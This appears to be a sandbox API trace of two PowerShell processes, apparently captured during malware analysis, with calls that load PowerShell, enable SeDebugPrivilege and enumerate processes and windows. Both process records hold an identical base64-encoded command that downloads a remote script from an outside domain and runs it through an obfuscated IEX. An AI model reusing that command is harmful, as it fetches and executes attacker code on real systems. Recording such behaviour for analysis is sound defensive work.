	[0905.012] ResetEvent (hEvent=0x358) returned 1

Thread:
	id = 2047
	os_tid = 0x27ec


Process:
	id = "143"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x46ea8000"
	os_pid = "0x1670"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 731
	os_tid = 0x1674

	[0454.708] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 820
	os_tid = 0x10bc


Thread:
	id = 829
	os_tid = 0x1124


Process:
	id = "144"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4e744000"
	os_pid = "0x1678"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "35"
	os_parent_pid = "0x2b0"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 732
	os_tid = 0x167c

	[0442.048] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0824.451] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0833.129] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0833.129] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0833.130] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0833.130] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0862.299] GetVersionExW (in: lpVersionInformation=0xcdfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0862.304] GetVersionExW (in: lpVersionInformation=0xcdfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0862.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.318] GetVersionExW (in: lpVersionInformation=0xcdd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0862.319] SetErrorMode (uMode=0x1) returned 0x1
	[0862.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcde90 | out: lpFileInformation=0xcde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0862.321] SetErrorMode (uMode=0x1) returned 0x1
	[0862.324] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xce100 | out: lpdwHandle=0xce100) returned 0x94c
	[0863.586] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c672a0 | out: lpData=0x2c672a0) returned 1
	[0863.589] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xce078, puLen=0xce070 | out: lplpBuffer=0xce078*=0x2c6733c, puLen=0xce070) returned 1
	[0863.591] lstrlenW (lpString="䅁") returned 1
	[0863.600] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c67418, puLen=0xcdfe0) returned 1
	[0863.601] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0863.603] CoTaskMemAlloc (cb=0x2e) returned 0x1e6470
	[0863.603] lstrcpyW (in: lpString1=0x1e6470, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0863.604] CoTaskMemFree (pv=0x1e6470) 
	[0863.604] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c6746c, puLen=0xcdfe0) returned 1
	[0863.604] lstrlenW (lpString="System.Management.Automation") returned 28
	[0863.604] CoTaskMemAlloc (cb=0x3c) returned 0x1aee60
	[0863.604] lstrcpyW (in: lpString1=0x1aee60, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0863.604] CoTaskMemFree (pv=0x1aee60) 
	[0863.605] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c674c8, puLen=0xcdfe0) returned 1
	[0863.605] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0863.605] CoTaskMemAlloc (cb=0x20) returned 0x1ec1d0
	[0863.605] lstrcpyW (in: lpString1=0x1ec1d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0863.605] CoTaskMemFree (pv=0x1ec1d0) 
	[0863.605] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c67508, puLen=0xcdfe0) returned 1
	[0863.605] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0863.605] CoTaskMemAlloc (cb=0x44) returned 0x1aee60
	[0863.605] lstrcpyW (in: lpString1=0x1aee60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0863.605] CoTaskMemFree (pv=0x1aee60) 
	[0863.605] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c67570, puLen=0xcdfe0) returned 1
	[0863.605] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0863.605] CoTaskMemAlloc (cb=0x76) returned 0x192fe0
	[0863.605] lstrcpyW (in: lpString1=0x192fe0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0863.605] CoTaskMemFree (pv=0x192fe0) 
	[0863.605] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c6760c, puLen=0xcdfe0) returned 1
	[0863.605] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0863.605] CoTaskMemAlloc (cb=0x44) returned 0x1aee60
	[0863.605] lstrcpyW (in: lpString1=0x1aee60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0863.605] CoTaskMemFree (pv=0x1aee60) 
	[0863.605] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c67670, puLen=0xcdfe0) returned 1
	[0863.605] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0863.605] CoTaskMemAlloc (cb=0x58) returned 0x150dc0
	[0863.605] lstrcpyW (in: lpString1=0x150dc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0863.605] CoTaskMemFree (pv=0x150dc0) 
	[0863.606] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c676ec, puLen=0xcdfe0) returned 1
	[0863.606] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0863.606] CoTaskMemAlloc (cb=0x20) returned 0x1ec1d0
	[0863.606] lstrcpyW (in: lpString1=0x1ec1d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0863.606] CoTaskMemFree (pv=0x1ec1d0) 
	[0863.606] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x2c67394, puLen=0xcdfe0) returned 1
	[0863.606] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0863.606] CoTaskMemAlloc (cb=0x66) returned 0x15b8d0
	[0863.606] lstrcpyW (in: lpString1=0x15b8d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0863.609] CoTaskMemFree (pv=0x15b8d0) 
	[0863.609] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x0, puLen=0xcdfe0) returned 0
	[0863.609] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x0, puLen=0xcdfe0) returned 0
	[0863.609] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdfe8, puLen=0xcdfe0 | out: lplpBuffer=0xcdfe8*=0x0, puLen=0xcdfe0) returned 0
	[0863.609] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdfb8, puLen=0xcdfb0 | out: lplpBuffer=0xcdfb8*=0x2c6733c, puLen=0xcdfb0) returned 1
	[0863.610] CoTaskMemAlloc (cb=0x204) returned 0x1953d0
	[0863.610] VerLanguageNameW (in: wLang=0x0, szLang=0x1953d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0863.613] CoTaskMemFree (pv=0x1953d0) 
	[0863.613] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\", lplpBuffer=0xce008, puLen=0xce000 | out: lplpBuffer=0xce008*=0x2c672c8, puLen=0xce000) returned 1
	[0864.414] GetCurrentProcessId () returned 0x1678
	[0864.431] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccf30 | out: lpLuid=0xccf30*(LowPart=0x14, HighPart=0)) returned 1
	[0864.434] GetCurrentProcess () returned 0xffffffffffffffff
	[0864.434] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccf50 | out: TokenHandle=0xccf50*=0x2b8) returned 1
	[0864.435] AdjustTokenPrivileges (in: TokenHandle=0x2b8, DisableAllPrivileges=0, NewState=0x2c6ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0864.437] CloseHandle (hObject=0x2b8) returned 1
	[0864.441] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1678) returned 0x2b8
	[0865.372] EnumProcessModules (in: hProcess=0x2b8, lphModule=0x2c6ab80, cb=0x200, lpcbNeeded=0xcdf68 | out: lphModule=0x2c6ab80, lpcbNeeded=0xcdf68) returned 1
	[0865.374] GetModuleInformation (in: hProcess=0x2b8, hModule=0x13f370000, lpmodinfo=0x2c6adf0, cb=0x18 | out: lpmodinfo=0x2c6adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0865.375] CoTaskMemAlloc (cb=0x804) returned 0x1ece50
	[0865.375] GetModuleBaseNameW (in: hProcess=0x2b8, hModule=0x13f370000, lpBaseName=0x1ece50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0865.375] CoTaskMemFree (pv=0x1ece50) 
	[0865.376] CoTaskMemAlloc (cb=0x804) returned 0x1ece50
	[0865.376] GetModuleFileNameExW (in: hProcess=0x2b8, hModule=0x13f370000, lpFilename=0x1ece50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0865.376] CoTaskMemFree (pv=0x1ece50) 
	[0865.377] CloseHandle (hObject=0x2b8) returned 1
	[0865.387] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1678) returned 0x2b8
	[0865.388] GetExitCodeProcess (in: hProcess=0x2b8, lpExitCode=0xce098 | out: lpExitCode=0xce098*=0x103) returned 1
	[0865.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c6b088, Length=0x20000, ResultLength=0xce060 | out: SystemInformation=0x12c6b088, ResultLength=0xce060*=0x47308) returned 0xc0000004
	[0865.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c8b0b8, Length=0x49b08, ResultLength=0xce060 | out: SystemInformation=0x12c8b0b8, ResultLength=0xce060*=0x47308) returned 0x0
	[0866.473] EnumWindows (lpEnumFunc=0x2a566ac, lParam=0x0) 
	[0867.395] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.395] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x558
	[0867.395] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x538
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x778
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x778
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.396] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x460
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1fb0
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1e10
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x23a8
	[0867.397] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1f24
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x21ec
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x2320
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1fd4
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1880
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b18
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1d6c
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x233c
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x2368
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x2124
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x22f0
	[0867.398] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x22ac
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1cdc
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x10f0
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1f18
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x20a8
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x2004
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1f88
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1f84
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x2050
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1e04
	[0867.399] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1ecc
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1e64
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b58
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1e94
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1e28
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1df8
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1da8
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1c70
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x163c
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1a10
	[0867.400] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x186c
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1d74
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4c8
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1960
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1ce4
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b24
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x14e0
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x17f0
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x854
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1268
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1624
	[0867.401] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b9c
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x16f4
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x145c
